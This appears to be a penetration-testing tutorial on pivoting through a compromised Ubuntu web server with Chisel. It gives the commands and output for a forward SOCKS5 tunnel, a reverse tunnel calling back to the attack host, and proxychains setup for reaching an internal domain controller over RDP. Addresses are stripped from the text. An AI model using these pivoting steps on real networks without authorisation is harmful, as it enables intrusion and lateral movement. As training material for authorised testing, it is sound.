SOCKS5 Tunneling with Chisel

Chisel is a TCP/UDP-based tunneling tool that uses HTTP to transport data that is secured using SSH. Chisel can create a client-server tunnel connection in a firewall restricted environment.

Scenario: We have to tunnel our traffic to a webserver on the network (internal network). We have the Domain Controller with the address This is not directly accessible to our attack host since our attack host and the domain controller belong to different network segments. However, since we have compromised the Ubuntu server, we can start a Chisel server on it that will listen on a specific port and forward our traffic to the internal network through the established tunnel.

neutron@kali[/kali]$ git clone
neutron@kali[/kali]$ cd chisel && go build
neutron@kali[/kali]$ scp chisel [email protected]:~/

[email protected]'s password: 
chisel                                        100%   11MB   1.2MB/s   00:09    

Running the Chisel Server on the Pivot Host

ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5

2022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=
2022/05/05 18:16:25 server: Listening on

The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host. In our case, the pivot host has an interface on the network, which will allow us to reach hosts on that network.

Start a client on our attack host and connect to the Chisel server

neutron@kali[/kali]$ ./chisel client -v socks

2022/05/05 14:21:18 client: Connecting to ws://
2022/05/05 14:21:18 client: tun: proxy#>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected

The Chisel client has created a TCP/UDP tunnel via HTTP secured using SSH between the Chisel server and the client and has started listening on port 1080. Now we can modify our proxychains.conf file and add 1080 port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel.

neutron@kali[/kali]$ tail -f /etc/proxychains.conf 

#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 9050
socks5 1080

Now if we use proxychains with RDP, we can connect to the DC on the internal network through the tunnel we have created to the Pivot host.

Chisel Reverse Pivot

There may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option.

When the Chisel server has --reverse enabled, remotes can be prefixed with R to denote reversed. The server will listen and accept connections, and they will be proxied through the client, which specified the remote. Reverse remotes specifying R:socks will listen on the server's default socks port (1080) and terminate the connection at the client's internal SOCKS5 proxy.

Start the server in our attack host with the option --reverse

neutron@kali[/kali]$ sudo ./chisel server --reverse -v -p 1234 --socks5

2022/05/30 10:19:16 server: Reverse tunnelling enabled
2022/05/30 10:19:16 server: Fingerprint n6UFN6zV4F+MLB8WV3x25557w/gHqMRggEnn15q9xIk=
2022/05/30 10:19:16 server: Listening on

Connect from the pivot host to our attack host, using the option R:socks

ubuntu@WEB01$ ./chisel client -v R:socks

2022/05/30 14:19:29 client: Connecting to ws://
2022/05/30 14:19:29 client: Handshaking...
2022/05/30 14:19:30 client: Sending config
2022/05/30 14:19:30 client: Connected (Latency 117.204196ms)
2022/05/30 14:19:30 client: tun: SSH connected

Editing & Confirming proxychains.conf

neutron@kali[/kali]$ tail -f /etc/proxychains.conf 

# add proxy here ...
# socks4 9050
socks5 1080 

If we use proxychains with RDP, we can connect to the DC on the internal network through the tunnel we have created to the Pivot host.